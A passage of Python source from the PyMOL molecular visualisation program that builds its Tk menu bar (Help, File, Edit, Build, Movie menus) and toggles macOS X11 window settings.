"defaults write com.apple.x11 wm_ffm -bool true")
os.system(
"defaults write org.x.X11 wm_ffm -bool true")
print("Enabled wm_click_through and wm_ffm.", end=' ')
else:
os.system(
"defaults write com.apple.x11 wm_click_through -bool false")
os.system(
"defaults write org.x.X11 wm_click_through -bool false")
os.system(
"defaults write com.apple.x11 wm_ffm -bool false")
os.system(
"defaults write org.x.X11 wm_ffm -bool false")
print("Disabled wm_click_through and wm_ffm.", end=' ')
print("Please restart X11.")
def createMenuBar(self):
self.menuBar = Pmw.MenuBar(self.root, balloon=self.balloon,
hull_relief=RAISED, hull_borderwidth=1)
self.menuBar.pack(fill=X)
addmenuitem = self.menuBar.addmenuitem
addcascademenu = self.menuBar.addcascademenu
# self.menuBar.addmenu('Tutorial', 'Tutorial', side='right')
# self.menuBar.addmenuitem('Tutorial', 'command', 'Open tutorial data file.',
# label='Open File...',
# command=lambda s=self: s.file_open(tutorial=1))
# to come
# self.menuBar.addmenuitem('Tutorial', 'separator', '')
#
# self.menuBar.addmenuitem('Tutorial', 'command', 'Beginners',
# label='Beginners',
# command = lambda s=self: None)
self.menuBar.addmenu('Help', 'About %s' % self.appname, side='right')
try:
import webbrowser
browser_open = webbrowser.open
# workaround for problematic webbrowser module under Mac OS X
try:
if sys.platform == 'darwin':
browser_open = darwin_browser_open
except:
pass
self.menuBar.addmenuitem('Help', 'command', label='PyMOL Command Reference',
command=lambda: browser_open('http://pymol.org/pymol-command-ref.html'))
self.menuBar.addmenuitem('Help', 'separator', '')
self.menuBar.addmenuitem('Help', 'command',
'Access the Official PyMOL Documentation online',
label='Online Documentation',
command = lambda bo=browser_open:bo("http://pymol.org/dsc"))
self.menuBar.addcascademenu('Help', 'Topics', 'Topics',
label='Topics',tearoff=FALSE)
self.menuBar.addmenuitem('Topics', 'command',
'Introductory Screencasts',
label='Introductory Screencasts',
command = lambda bo=browser_open:bo("http://pymol.org/dsc/id/media:intro"))
self.menuBar.addmenuitem('Topics', 'command',
'Core Commands',
label='Core Commands',
command = lambda bo=browser_open:bo("http://pymol.org/dsc/id/command:core_set"))
self.menuBar.addmenuitem('Topics', 'separator', '')
self.menuBar.addmenuitem('Topics', 'command',
'Settings',
label='Settings',
command = lambda bo=browser_open:bo("http://pymol.org/dsc/id/setting"))
self.menuBar.addmenuitem('Topics', 'command',
'Atom Selections',
label='Atom Selections',
command = lambda bo=browser_open:bo("http://pymol.org/dsc/id/selection"))
self.menuBar.addmenuitem('Topics', 'command',
'Commands',
label='Commands',
command = lambda bo=browser_open:bo("http://pymol.org/dsc/id/command"))
self.menuBar.addmenuitem('Topics', 'command',
'Launching',
label='Launching',
command = lambda bo=browser_open:bo("http://pymol.org/dsc/id/launch"))
self.menuBar.addmenuitem('Topics', 'separator', '')
self.menuBar.addmenuitem('Topics', 'command',
'Concepts',
label='Concepts',
command = lambda bo=browser_open:bo("http://pymol.org/dsc/id/concept"))
self.menuBar.addmenuitem('Topics', 'separator', '')
self.menuBar.addmenuitem('Topics', 'command',
'A.P.I. Methods',
label='A.P.I. Methods',
command = lambda bo=browser_open:bo("http://pymol.org/dsc/id/api"))
self.menuBar.addmenuitem('Help', 'separator', '')
self.menuBar.addmenuitem('Help', 'command',
'Access the community-maintained PyMOL Wiki',
label='PyMOL Community Wiki',
command = lambda bo=browser_open:bo("http://www.pymolwiki.org"))
self.menuBar.addmenuitem('Help', 'command',
'Join or browse the pymol-users mailing list',
label='PyMOL Mailing List',
command = lambda bo=browser_open:bo("https://lists.sourceforge.net/lists/listinfo/pymol-users"))
self.menuBar.addmenuitem('Help', 'command',
'Access the PyMOL Home Page',
label='PyMOL Home Page',
command = lambda bo=browser_open:bo("http://www.pymol.org"))
self.menuBar.addmenuitem('Help', 'separator', '')
self.menuBar.addmenuitem('Help', 'command',
'Email PyMOL Help',
label='Email PyMOL Help',
command = lambda bo=browser_open:bo("mailto:[email protected]?subject=PyMOL%20Question"))
self.menuBar.addmenuitem('Help', 'separator', '')
self.menuBar.addmenuitem('Help', 'command',
'Get information on application',
label='About PyMOL', command = lambda s=self:s.show_about())
if self.pymol.cmd.splash(2):
self.menuBar.addmenuitem('Help', 'command',
'Sponsor PyMOL by becoming a Subscriber',
label='Sponsorship Information',
command = lambda bo=browser_open:bo("http://pymol.org/funding.html"))
self.menuBar.addmenuitem('Help', 'command',
'Learn How to Cite PyMOL',
label='How to Cite PyMOL', command = lambda bo=browser_open:bo("http://pymol.org/citing"))
#self.menuBar.addmenuitem('Help', 'separator', '')
#self.menuBar.addmenuitem('Help', 'command',
# 'Output License Terms',
# label='Output License Terms',
# command = lambda s=self:s.cat_terms())
except ImportError:
pass
# self.menuBar.addmenuitem('Help', 'command', 'Release Notes',
# label='Release Notes',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('release')"))
# self.menuBar.addmenuitem('Help', 'separator', '')
# self.menuBar.addmenuitem('Help', 'command', 'Help on Commands',
# label='Commands',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('commands')"))
# self.menuBar.addmenuitem('Help', 'command', 'Help on Launching',
# label='Launching',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('launching')"))
# self.menuBar.addmenuitem('Help', 'separator', '')
# self.menuBar.addmenuitem('Help', 'command', 'Help on Selections',
# label='Select Command',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('select')"))
# self.menuBar.addmenuitem('Help', 'command', 'Help on Selections',
# label='Selection Syntax',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('selections')"))
# self.menuBar.addmenuitem('Help', 'command', 'Example Selections',
# label='Selection Examples',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('examples')"))
# self.menuBar.addmenuitem('Help', 'separator', '')
# self.menuBar.addmenuitem('Help', 'command', 'Help on the Mouse',
# label='Mouse',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('mouse')"))
# self.menuBar.addmenuitem('Help', 'command', 'Help on the Keyboard',
# label='Keyboard',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('keyboard')"))
# self.menuBar.addmenuitem('Help', 'command', 'Help on Molecular Editing',
# label='Molecular Editing',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('editing')"))
# self.menuBar.addmenuitem('Help', 'command', 'Help on Molecular Editing',
# label='Molecular Editing Keys',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('edit_keys')"))
# self.menuBar.addmenuitem('Help', 'command', 'Help on Stereo',
# label='Stereo',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('stereo')"))
# self.menuBar.addmenuitem('Help', 'separator', '')
# self.menuBar.addmenuitem('Help', 'command', 'Help on the API',
# label='API',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('api')"))
self.toggleBalloonVar = IntVar()
self.toggleBalloonVar.set(0)
self.setting = Setting(self.app)
# self.menuBar.addmenuitem('Help', 'separator', '')
# self.menuBar.addmenuitem('Help', 'checkbutton',
# 'Toggle balloon help',
# label='Balloon help',
# variable = self.toggleBalloonVar,
# command=self.toggleBalloon)
self.menuBar.addmenu('File', 'File Input',tearoff=TRUE)
self.menuBar.addmenuitem('File', 'command', 'Open structure file.',
label='Open...',
command=self.file_open)
self.menuBar.addmenuitem('File', 'command', 'Save session.',
label='Save Session',
command=self.session_save)
self.menuBar.addmenuitem('File', 'command', 'Save session.',
label='Save Session As...',
command=self.session_save_as)
self.menuBar.addmenuitem('File', 'command', 'Save structure file.',
label='Save Molecule...',
command=self.file_save)
# self.menuBar.addmenuitem('File', 'command', 'Open sequential files.',
# label='Open Sequence...',
# command=self.file_open)
self.menuBar.addcascademenu('File', 'SaveImageAs', 'Save Image As',
label='Save Image As',tearoff=FALSE)
self.menuBar.addmenuitem('SaveImageAs', 'command', 'Save current image as PNG Image.',
label='PNG...',
command=self.file_save_png)
self.menuBar.addmenuitem('SaveImageAs', 'separator', '')
self.menuBar.addmenuitem('SaveImageAs', 'command', 'Save current image as VRML.',
label='VRML 2...',
command=self.file_save_wrl)
self.menuBar.addmenuitem('SaveImageAs', 'command', 'Save current image as COLLADA.',
label='COLLADA...',
command=self.file_save_dae)
self.menuBar.addmenuitem('SaveImageAs', 'command', 'Save current image as PovRay input.',
label='POV-Ray...',
command=self.file_save_pov)
self.menuBar.addcascademenu('File', 'SaveMovieAs', 'Save Movie As',
label='Save Movie As',tearoff=FALSE)
self.menuBar.addmenuitem('SaveMovieAs', 'command', 'Save all frames as an MPEG movie.',
label='MPEG...',
command=self.file_save_mpeg)
self.menuBar.addmenuitem('SaveMovieAs', 'separator', '')
self.menuBar.addmenuitem('SaveMovieAs', 'command', 'Save all frames as images.',
label='PNG Images...',
command=self.file_save_mpng)
self.menuBar.addmenuitem('File', 'separator', '')
addcascademenu('File', 'Logging', label='Log File')
addmenuitem('Logging', 'command', label='Open...', command=self.log_open)
addmenuitem('Logging', 'command', label='Resume...', command=self.log_resume)
addmenuitem('Logging', 'command', label='Append...', command=self.log_append)
addmenuitem('Logging', 'command', label='Close', command=self.cmd.log_close)
self.menuBar.addmenuitem('File', 'command', 'Run program or script.',
label='Run Script...',
command=self.file_run)
addcascademenu('File', 'WorkDir', label='Working Directory')
addmenuitem('WorkDir', 'command', label='Change...',
command=self.cd_dialog)
if sys.platform == 'darwin':
file_browser = lambda: self.cmd.system('open .')
elif sys.platform == 'win32':
file_browser = lambda: self.cmd.system('explorer .')
else:
file_browser = None
if file_browser:
addmenuitem('WorkDir', 'command', label='File Browser',
command=file_browser)
self.menuBar.addmenuitem('File', 'separator', '')
self.menuBar.addmenuitem('File', 'command', 'Edit pymolrc',
label='Edit pymolrc',
command=self.edit_pymolrc)
self.menuBar.addmenuitem('File', 'separator', '')
self.menuBar.addmenuitem('File', 'command', 'Quit PyMOL',
label='Quit',
command=self.confirm_quit)
addcascademenu('File', 'Reinit', label='Reinitialize')
addmenuitem('Reinit', 'command', label='Everything',
command=self.cmd.reinitialize)
addmenuitem('Reinit', 'command', label='Original Settings',
command=lambda: self.cmd.reinitialize('original_settings'))
addmenuitem('Reinit', 'command', label='Stored Settings',
command=lambda: self.cmd.reinitialize('settings'))
addmenuitem('Reinit', 'separator')
addmenuitem('Reinit', 'command', label='Store Current Settings',
command=lambda: self.cmd.reinitialize('store_defaults'))
self.menuBar.addmenu('Edit', 'Edit',tearoff=TRUE)
if sys.platform == 'win32':
if self.app.pymol.invocation.options.incentive_product:
self.menuBar.addmenuitem('Edit', 'command',
'Copy Image',
label='Copy Image to Clipboard',
command = lambda s=self:s.cmd.copy_image(quiet=0))
self.menuBar.addmenuitem('Edit', 'separator', '')
self.menuBar.addmenuitem('Edit', 'command', 'Undo',
label='Undo [Ctrl-Z]',
command = lambda s=self: s.cmd.do("_ undo"))
self.menuBar.addmenuitem('Edit', 'command', 'Redo',
label='Redo [Ctrl-Y]',
command = lambda s=self: s.cmd.do("_ redo"))
self.menuBar.addmenuitem('Edit', 'separator', '')
self.menuBar.addmenuitem('Edit', 'command',
'To Copy Text: Use Ctrl-C in TclTk GUI',
label='To copy text use Ctrl-C in the TclTk GUI',
state='disabled',
command = None)
self.menuBar.addmenuitem('Edit', 'command',
'To Paste Text, Use Ctrl-V in TclTk GUI',
label='To paste text use Ctrl-V in the TckTk GUI',
state='disabled',
command = None)
if sys.platform == 'win32':
if self.app.pymol.invocation.options.incentive_product:
self.menuBar.addmenuitem('Edit', 'separator', '')
self.menuBar.addmenuitem('Edit', 'checkbutton',
'Auto-Copy Images',
label='Auto-Copy Images',
variable = self.setting.auto_copy_images,
)
self.menuBar.addmenu('Build', 'Build',tearoff=TRUE)
self.menuBar.addcascademenu('Build', 'Fragment', 'Fragment',
label='Fragment',tearoff=TRUE)
# self.menuBar.addmenu('Fragment', 'Fragment')
self.menuBar.addmenuitem('Fragment', 'command', 'Acetylene',
label='Acetylene [Alt-J]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_fragment('pk1','acetylene',2,0)"))
self.menuBar.addmenuitem('Fragment', 'command', 'Amide N->C',
label='Amide N->C [Alt-1]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_fragment('pk1','formamide',3,1)"))
self.menuBar.addmenuitem('Fragment', 'command', 'Amide C->N',
label='Amide C->N [Alt-2]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_fragment('pk1','formamide',5,0)"))
self.menuBar.addmenuitem('Fragment', 'command', 'Bromine',
label='Bromine [Ctrl-Shift-B]',
command = lambda s=self: s.cmd.do("_ replace Br,1,1"))
self.menuBar.addmenuitem('Fragment', 'command', 'Carbon',
label='Carbon [Ctrl-Shift-C]',
command = lambda s=self: s.cmd.do("_ replace C,4,4"))
self.menuBar.addmenuitem('Fragment', 'command', 'Carbonyl',
label='Carbonyl [Alt-0]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_fragment('pk1','formaldehyde',2,0)"))
self.menuBar.addmenuitem('Fragment', 'command', 'Chlorine',
label='Chlorine [Ctrl-Shift-L]',
command = lambda s=self: s.cmd.do("_ replace Cl,1,1"))
self.menuBar.addmenuitem('Fragment', 'command', 'Cyclobutyl',
label='Cyclobutyl [Alt-4]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_fragment('pk1','cyclobutane',4,0)"))
self.menuBar.addmenuitem('Fragment', 'command', 'Cyclopentyl',
label='Cyclopentyl [Alt-5]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_fragment('pk1','cyclopentane',5,0)"))
self.menuBar.addmenuitem('Fragment', 'command', 'Cyclopentadiene',
label='Cyclopentadiene [Alt-8]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_fragment('pk1','cyclopentadiene',5,0)"))
self.menuBar.addmenuitem('Fragment', 'command', 'Cyclohexyl',
label='Cyclohexyl [Alt-6]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_fragment('pk1','cyclohexane',7,0)"))
self.menuBar.addmenuitem('Fragment', 'command', 'Cycloheptyl',
label='Cycloheptyl [Alt-7]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_fragment('pk1','cycloheptane',8,0)"))
self.menuBar.addmenuitem('Fragment', 'command', 'Fluorine',
label='Fluorine [Ctrl-Shift-F]',
command = lambda s=self: s.cmd.do("_ replace F,1,1"))
self.menuBar.addmenuitem('Fragment', 'command', 'Iodine',
label='Iodine [Ctrl-Shift-I]',
command = lambda s=self: s.cmd.do("_ replace I,1,1"))
self.menuBar.addmenuitem('Fragment', 'command', 'Methane',
label='Methane [Ctrl-Shift-M]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_fragment('pk1','methane',1,0)"))
self.menuBar.addmenuitem('Fragment', 'command', 'Nitrogen',
label='Nitrogen [Ctrl-Shift-N]',
command = lambda s=self: s.cmd.do("_ replace N,4,3"))
self.menuBar.addmenuitem('Fragment', 'command', 'Oxygen',
label='Oxygen [Ctrl-Shift-O]',
command = lambda s=self: s.cmd.do("_ replace O,4,2"))
self.menuBar.addmenuitem('Fragment', 'command', 'Phenyl',
label='Phenyl [Alt-9]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_fragment('pk1','benzene',6,0)"))
self.menuBar.addmenuitem('Fragment', 'command', 'Sulfer',
label='Sulfer [Ctrl-Shift-S]',
command = lambda s=self: s.cmd.do("_ replace S,2,2"))
self.menuBar.addmenuitem('Fragment', 'command', 'Sulfonyl',
label='Sulfonyl [Alt-3]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_fragment('pk1','sulfone',3,1)"))
self.menuBar.addmenuitem('Fragment', 'command', 'Phosphorus',
label='Phosphorus [Ctrl-Shift-P]',
command = lambda s=self: s.cmd.do("_ replace P,4,3"))
# self.menuBar.addmenu('Residue', 'Residue')
self.menuBar.addcascademenu('Build', 'Residue', 'Residue',
label='Residue',tearoff=TRUE)
self.menuBar.addmenuitem('Residue', 'command', 'Acetyl',
label='Acetyl [Alt-B]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','ace')"))
self.menuBar.addmenuitem('Residue', 'command', 'Alanine',
label='Alanine [Alt-A]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','ala')"))
self.menuBar.addmenuitem('Residue', 'command', 'Amine',
label='Amine',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','nhh')"))
self.menuBar.addmenuitem('Residue', 'command', 'Aspartate',
label='Aspartate [Alt-D]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','asp')"))
self.menuBar.addmenuitem('Residue', 'command', 'Asparagine',
label='Asparagine [Alt-N]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','asn')"))
self.menuBar.addmenuitem('Residue', 'command', 'Arginine',
label='Arginine [Alt-R]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','arg')"))
self.menuBar.addmenuitem('Residue', 'command', 'Cysteine',
label='Cysteine [Alt-C]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','cys')"))
self.menuBar.addmenuitem('Residue', 'command', 'Glutamate',
label='Glutamate [Alt-E]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','glu')"))
self.menuBar.addmenuitem('Residue', 'command', 'Glutamine',
label='Glutamine [Alt-Q]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','gln')"))
self.menuBar.addmenuitem('Residue', 'command', 'Glycine',
label='Glycine [Alt-G]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','gly')"))
self.menuBar.addmenuitem('Residue', 'command', 'Histidine',
label='Histidine [Alt-H]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','his')"))
self.menuBar.addmenuitem('Residue', 'command', 'Isoleucine',
label='Isoleucine [Alt-I]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','ile')"))
self.menuBar.addmenuitem('Residue', 'command', 'Leucine',
label='Leucine [Alt-L]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','leu')"))
self.menuBar.addmenuitem('Residue', 'command', 'Lysine',
label='Lysine [Alt-K]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','lys')"))
self.menuBar.addmenuitem('Residue', 'command', 'Methionine',
label='Methionine [Alt-M]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','met')"))
self.menuBar.addmenuitem('Residue', 'command', 'N-Methyl',
label='N-Methyl [Alt-Z]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','nme')"))
self.menuBar.addmenuitem('Residue', 'command', 'Phenylalanine',
label='Phenylalanine [Alt-F]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','phe')"))
self.menuBar.addmenuitem('Residue', 'command', 'Proline',
label='Proline [Alt-P]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','pro')"))
self.menuBar.addmenuitem('Residue', 'command', 'Serine',
label='Serine [Alt-S]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','ser')"))
self.menuBar.addmenuitem('Residue', 'command', 'Threonine',
label='Threonine [Alt-T]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','thr')"))
self.menuBar.addmenuitem('Residue', 'command', 'Tryptophan',
label='Tryptophan [Alt-W]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','trp')"))
self.menuBar.addmenuitem('Residue', 'command', 'Tyrosine',
label='Tyrosine [Alt-Y]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','tyr')"))
self.menuBar.addmenuitem('Residue', 'command', 'Valine',
label='Valine [Alt-V]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','val')"))
self.menuBar.addmenuitem('Residue', 'separator', '')
var = self.setting.secondary_structure
for lab, val in [
('Helix', 1),
('Antiparallel Beta Sheet', 2),
('Parallel Beta Sheet', 3),
]:
addmenuitem('Residue', 'radiobutton', label=lab, value=val, variable=var)
self.menuBar.addmenuitem('Build', 'separator', '')
self.menuBar.addcascademenu('Build', 'Sculpting', 'Sculpting',
label='Sculpting',tearoff=TRUE)
self.menuBar.addmenuitem('Sculpting', 'checkbutton',
'Auto-Sculpt.',
label='Auto-Sculpting',
variable = self.setting.auto_sculpt,
)
self.menuBar.addmenuitem('Sculpting', 'checkbutton',
'Sculpting.',
label='Sculpting',
variable = self.setting.sculpting,
)
self.menuBar.addmenuitem('Sculpting', 'separator', '')
self.menuBar.addmenuitem('Sculpting', 'command', 'Activate',
label='Activate',
command = lambda s=self: s.cmd.do("_ sculpt_activate all"))
self.menuBar.addmenuitem('Sculpting', 'command', 'Deactivate',
label='Deactivate',
command = lambda s=self: s.cmd.do("_ sculpt_deactivate all"))
self.menuBar.addmenuitem('Sculpting', 'command', 'Clear Memory',
label='Clear Memory',
command = lambda s=self: s.cmd.do("_ sculpt_purge"))
self.menuBar.addmenuitem('Sculpting', 'separator', '')
addmenuitem('Sculpting', 'radiobutton', label='1 Cycle per Update', value=1,
variable=self.setting.sculpting_cycles)
for val in [3, 10, 33, 100, 333, 1000]:
addmenuitem('Sculpting', 'radiobutton', label='%d Cycles per Update' % val, value=val,
variable=self.setting.sculpting_cycles)
self.menuBar.addmenuitem('Sculpting', 'separator', '')
#define cSculptBond 0x01
#define cSculptAngl 0x02
#define cSculptPyra 0x04
#define cSculptPlan 0x08
#define cSculptLine 0x10
#define cSculptVDW 0x20
#define cSculptVDW14 0x40
#define cSculptTors 0x80
var = self.setting.sculpt_field_mask
for lab, val in [
('Bonds Only', 0x01),
('Bonds & Angles Only', 0x01+0x02),
('Local Geometry Only', 0x01+0x02+0x04+0x08+0x10),
('All Except VDW', 0x01+0x02+0x04+0x08+0x10+0x80),
('All Except 1-4 VDW & Torsions', 0x01+0x02+0x04+0x08+0x10+0x20),
('All Terms', 0xFF),
]:
addmenuitem('Sculpting', 'radiobutton', label=lab, value=val, variable=var)
self.menuBar.addmenuitem('Build', 'separator', '')
self.menuBar.addmenuitem('Build', 'command', 'Cycle Bond Valence',
label='Cycle Bond Valence [Ctrl-Shift-W]',
command = lambda s=self: s.cmd.do("_ cycle_valence"))
self.menuBar.addmenuitem('Build', 'command', 'Fill Hydrogens',
label='Fill Hydrogens on (pk1) [Ctrl-Shift-R]',
command = lambda s=self: s.cmd.do("_ h_fill"))
self.menuBar.addmenuitem('Build', 'command', 'Invert',
label='Invert (pk2)-(pk1)-(pk3) [Ctrl-Shift-E]',
command = lambda s=self: s.cmd.do("_ invert"))
self.menuBar.addmenuitem('Build', 'command', 'Form Bond',
label='Create Bond (pk1)-(pk2) [Ctrl-Shift-T]',
command = lambda s=self: s.cmd.do("_ bond"))
self.menuBar.addmenuitem('Build', 'separator', '')
self.menuBar.addmenuitem('Build', 'command', 'Remove (pk1)',
label='Remove (pk1) [Ctrl-Shift-D]',
command = lambda s=self: s.cmd.do("_ remove pk1"))
self.menuBar.addmenuitem('Build', 'separator', '')
self.menuBar.addmenuitem('Build', 'command', 'Make Positive',
label='Make (pk1) Positive [Ctrl-Shift-K]',
command = lambda s=self: s.cmd.do("_ alter pk1,formal_charge=1.0"))
self.menuBar.addmenuitem('Build', 'command', 'Make Negative',
label='Make (pk1) Negative [Ctrl-Shift-J]',
command = lambda s=self: s.cmd.do("_ alter pk1,formal_charge=-1.0"))
self.menuBar.addmenuitem('Build', 'command', 'Make Neutral',
label='Make (pk1) Neutral [Ctrl-Shift-U]',
command = lambda s=self: s.cmd.do("_ alter pk1,formal_charge=-0.0"))
self.menuBar.addmenu('Movie', 'Movie Control',tearoff=TRUE)
self.menuBar.addcascademenu('Movie', 'Append', 'Append',
label='Append')
self.menuBar.addmenuitem('Append', 'command', '0.25 second',label='0.25 second',
command = lambda s=self: s.cmd.do("_ movie.add_blank(0.25)"))
self.menuBar.addmenuitem('Append', 'command', '0.5 second',label='0.5 second',
command = lambda s=self: s.cmd.do("_ movie.add_blank(0.5)"))
self.menuBar.addmenuitem('Append', 'command', '1 second',label='1 second',
command = lambda s=self: s.cmd.do("_ movie.add_blank(1.0)"))
self.menuBar.addmenuitem('Append', 'command', '2 seconds',label='2 seconds',
command = lambda s=self: s.cmd.do("_ movie.add_blank(2.0)"))
self.menuBar.addmenuitem('Append', 'command', '3 seconds',label='3 seconds',
command = lambda s=self: s.cmd.do("_ movie.add_blank(3.0)"))
self.menuBar.addmenuitem('Append', 'command', '4 seconds',label='4 seconds',
command = lambda s=self: s.cmd.do("_ movie.add_blank(4.0)"))
self.menuBar.addmenuitem('Append', 'command', '6 seconds',label='6 seconds',
command = lambda s=self: s.cmd.do("_ movie.add_blank(6.0)"))
self.menuBar.addmenuitem('Append', 'command', '8 seconds',label='8 seconds',
command = lambda s=self: s.cmd.do("_ movie.add_blank(8.0)"))
self.menuBar.addmenuitem('Append', 'command', '12 seconds',label='12 seconds',
command = lambda s=self: s.cmd.do("_ movie.add_blank(12.0)"))
self.menuBar.addmenuitem('Append', 'command', '18 seconds',label='18 seconds',
command = lambda s=self: s.cmd.do("_ movie.add_blank(18.0)"))
self.menuBar.addmenuitem('Append', 'command', '24 seconds',label='24 seconds',
command = lambda s=self: s.cmd.do("_ movie.add_blank(24.0)"))
self.menuBar.addmenuitem('Append', 'command', '30 seconds',label='30 seconds',
command = lambda s=self: s.cmd.do("_ movie.add_blank(30.0)"))
self.menuBar.addmenuitem('Append', 'command', '48 seconds',label='48 seconds',
command = lambda s=self: s.cmd.do("_ movie.add_blank(48.0)"))
self.menuBar.addmenuitem('Append', 'command', '60 seconds',label='60 seconds',
command = lambda s=self: s.cmd.do("_ movie.add_blank(60.0)"))
self.menuBar.addcascademenu('Movie', 'Program', 'Program',
label='Program')
self.menuBar.addmenuitem('Movie', 'command', 'Update Last Program',label='Update Last Program',
command = lambda s=self: s.mvprg())
self.menuBar.addmenuitem('Movie', 'command', 'Remove Last Program',label='Remove Last Program',
command = lambda s=self: s.mvprg(-1))
self.menuBar.addcascademenu('Program', 'Camera', 'Camera Loop',
label='Camera Loop')
self.menuBar.addcascademenu('Camera', 'Nutate', 'Nutate',
label='Nutate')
self.menuBar.addmenuitem('Camera', 'separator', '')
self.menuBar.addmenuitem('Nutate', 'command', '15 deg. over 4 sec.',label='15 deg. over 4 sec.',
command = lambda s=self: s.mvprg("_ movie.add_nutate(4,15,start=%d)"))
self.menuBar.addmenuitem('Nutate', 'command', '15 deg. over 8 sec.',label='15 deg. over 8 sec.',
command = lambda s=self: s.mvprg("_ movie.add_nutate(8,15,start=%d)"))
self.menuBar.addmenuitem('Nutate', 'command', '15 deg. over 12 sec.',label='15 deg. over 12 sec.',
command = lambda s=self: s.mvprg("_ movie.add_nutate(12,15,start=%d)"))
self.menuBar.addmenuitem('Nutate', 'separator', '')
self.menuBar.addmenuitem('Nutate', 'command', '30 deg. over 4 sec.',label='30 deg. over 4 sec.',
command = lambda s=self: s.mvprg("_ movie.add_nutate(4,30,start=%d)"))
self.menuBar.addmenuitem('Nutate', 'command', '30 deg. over 8 sec.',label='30 deg. over 8 sec.',
command = lambda s=self: s.mvprg("_ movie.add_nutate(8,30,start=%d)"))
self.menuBar.addmenuitem('Nutate', 'command', '30 deg. over 12 sec.',label='30 deg. over 12 sec.',
command = lambda s=self: s.mvprg("_ movie.add_nutate(12,30,start=%d)"))
self.menuBar.addmenuitem('Nutate', 'command', '30 deg. over 16 sec.',label='30 deg. over 16 sec.',
command = lambda s=self: s.mvprg("_ movie.add_nutate(16,30,start=%d)"))
self.menuBar.addmenuitem('Nutate', 'separator', '')
self.menuBar.addmenuitem('Nutate', 'command', '60 deg. over 8 sec.',label='60 deg. over 8 sec.',
command = lambda s=self: s.mvprg("_ movie.add_nutate(8,60,start=%d)"))
self.menuBar.addmenuitem('Nutate', 'command', '60 deg. over 16 sec.',label='60 deg. over 16 sec.',
command = lambda s=self: s.mvprg("_ movie.add_nutate(16,60,start=%d)"))
self.menuBar.addmenuitem('Nutate', 'command', '60 deg. over 24 sec.',label='60 deg. over 24 sec.',
command = lambda s=self: s.mvprg("_ movie.add_nutate(24,60,start=%d)"))
self.menuBar.addmenuitem('Nutate', 'command', '60 deg. over 32 sec.',label='60 deg. over 32 sec.',
command = lambda s=self: s.mvprg("_ movie.add_nutate(32,60,start=%d)"))
self.menuBar.addcascademenu('Camera', 'X-Rock', 'X-Rock',
label='X-Rock')
self.menuBar.addmenuitem('X-Rock', 'command', '30 deg. over 2 sec.',label='30 deg. over 2 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(2,30,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'command', '30 deg. over 4 sec.',label='30 deg. over 4 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(4,30,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'command', '30 deg. over 8 sec.',label='30 deg. over 8 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(8,30,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'separator', '')
self.menuBar.addmenuitem('X-Rock', 'command', '60 deg. over 4 sec.',label='60 deg. over 4 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(4,60,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'command', '60 deg. over 8 sec.',label='60 deg. over 8 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(8,60,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'command', '60 deg. over 16 sec.',label='60 deg. over 16 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(16,60,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'separator', '')
